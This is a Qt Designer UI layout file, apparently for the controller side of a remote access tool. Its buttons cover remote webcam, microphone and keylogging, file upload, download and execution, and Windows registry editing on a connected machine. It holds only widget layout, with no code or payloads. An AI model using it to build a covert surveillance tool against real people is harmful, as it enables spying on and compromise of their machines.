<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>ClientMainWindow</class>
 <widget class="QMainWindow" name="ClientMainWindow">
  <property name="geometry">
   <rect>
    <x>0</x>
    <y>0</y>
    <width>1280</width>
    <height>800</height>
   </rect>
  </property>
  <property name="minimumSize">
   <size>
    <width>1280</width>
    <height>800</height>
   </size>
  </property>
  <property name="maximumSize">
   <size>
    <width>1280</width>
    <height>800</height>
   </size>
  </property>
  <property name="windowTitle">
   <string>客户端（控制端）</string>
  </property>
  <widget class="QWidget" name="centralwidget">
   <widget class="QWidget" name="verticalLayoutWidget">
    <property name="geometry">
     <rect>
      <x>0</x>
      <y>0</y>
      <width>1280</width>
      <height>800</height>
     </rect>
    </property>
    <layout class="QVBoxLayout" name="verticalLayout" stretch="0,1,1,0,16">
     <property name="sizeConstraint">
      <enum>QLayout::SetMaximumSize</enum>
     </property>
     <item>
      <layout class="QHBoxLayout" name="horizontalLayout">
       <property name="sizeConstraint">
        <enum>QLayout::SetMaximumSize</enum>
       </property>
       <item>
        <widget class="QLabel" name="label">
         <property name="text">
          <string>服务端地址</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QLineEdit" name="ipInput">
         <property name="text">
          <string>localhost</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QLabel" name="label_2">
         <property name="text">
          <string>服务端端口</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QLineEdit" name="portInput">
         <property name="text">
          <string>25566</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QPushButton" name="Connect">
         <property name="text">
          <string>连接</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QPushButton" name="disConnect">
         <property name="text">
          <string>断开连接</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QPushButton" name="openCamera">
         <property name="text">
          <string>开启摄像头</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QPushButton" name="openMicrophone">
         <property name="text">
          <string>开启麦克风</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QPushButton" name="keylogger">
         <property name="text">
          <string>键盘记录</string>
         </property>
        </widget>
       </item>
      </layout>
     </item>
     <item>
      <widget class="QGroupBox" name="fileManegerGroup">
       <property name="title">
        <string>文件管理</string>
       </property>
       <widget class="QWidget" name="horizontalLayoutWidget_2">
        <property name="geometry">
         <rect>
          <x>10</x>
          <y>10</y>
          <width>1261</width>
          <height>31</height>
         </rect>
        </property>
        <layout class="QHBoxLayout" name="horizontalLayout_4">
         <item>
          <widget class="QPushButton" name="fileList">
           <property name="text">
            <string>浏览文件夹</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="fileDownload">
           <property name="text">
            <string>下载文件</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="fileUpload">
           <property name="text">
            <string>上传文件</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="fileExcute">
           <property name="text">
            <string>执行文件</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLabel" name="label_3">
           <property name="text">
            <string>客户端路径</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLineEdit" name="clientFilePath">
           <property name="text">
            <string>C:\OYSFiles</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLabel" name="label_4">
           <property name="text">
            <string>服务端路径</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLineEdit" name="serverFilePath">
           <property name="text">
            <string>C:\OYSFiles</string>
           </property>
          </widget>
         </item>
        </layout>
       </widget>
      </widget>
     </item>
     <item>
      <widget class="QGroupBox" name="regManegerGroup">
       <property name="title">
        <string>注册表管理</string>
       </property>
       <widget class="QWidget" name="horizontalLayoutWidget_6">
        <property name="geometry">
         <rect>
          <x>10</x>
          <y>10</y>
          <width>1261</width>
          <height>31</height>
         </rect>
        </property>
        <layout class="QHBoxLayout" name="horizontalLayout_8" stretch="0,0,0,0,0,0,0,1">
         <item>
          <widget class="QPushButton" name="regAdd">
           <property name="text">
            <string>添加</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="regDelete">
           <property name="text">
            <string>删除</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="regEdit">
           <property name="text">
            <string>修改</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QPushButton" name="regSearch">
           <property name="text">
            <string>查找</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLabel" name="label_11">
           <property name="text">
            <string>注册表值</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLineEdit" name="regValueInput">
           <property name="text">
            <string/>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLabel" name="label_12">
           <property name="text">
            <string>服务端注册表路径</string>
           </property>
          </widget>
         </item>
         <item>
          <widget class="QLineEdit" name="serverRegPath">
           <property name="text">
            <string/>
           </property>
          </widget>
         </item>
        </layout>
       </widget>
      </widget>
     </item>
     <item>
      <layout class="QHBoxLayout" name="horizontalLayout_3">
       <item>
        <widget class="QLabel" name="label_5">
         <property name="text">
          <string>日志</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QLabel" name="label_7">
         <property name="text">
          <string>文件管理</string>
         </property>
        </widget>
       </item>
       <item>
        <widget class="QLabel" name="label_6">
         <property name="text">
          <string>注册表管理</string>
         </property>
        </widget>
       </item>
      </layout>
     </item>
     <item>
      <layout class="QHBoxLayout" name="horizontalLayout_2">
       <item>
        <widget class="QTextBrowser" name="textBrowser"/>
       </item>
       <item>
        <widget class="QTextBrowser" name="fileManagerOutput"/>
       </item>
       <item>
        <widget class="QTextBrowser" name="regManagerOutput"/>
       </item>
      </layout>
     </item>
    </layout>
   </widget>
  </widget>
 </widget>
 <resources/>
 <connections/>
</ui>
